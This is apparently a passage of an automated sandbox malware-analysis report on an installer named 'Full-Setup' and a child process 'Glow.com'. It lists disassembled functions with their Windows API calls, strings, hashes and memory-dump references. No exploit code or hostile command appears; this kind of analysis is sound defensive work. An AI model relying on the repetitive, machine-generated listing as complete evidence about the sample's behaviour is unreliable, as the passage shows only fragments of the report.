Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

%02x%c, xrefs: 0040629C
..., xrefs: 004062BF

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427773,74DF23A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: Glow.comPID: 7576, Parent PID: 7364COMMON

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	66

Executed Functions

Function 00385FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

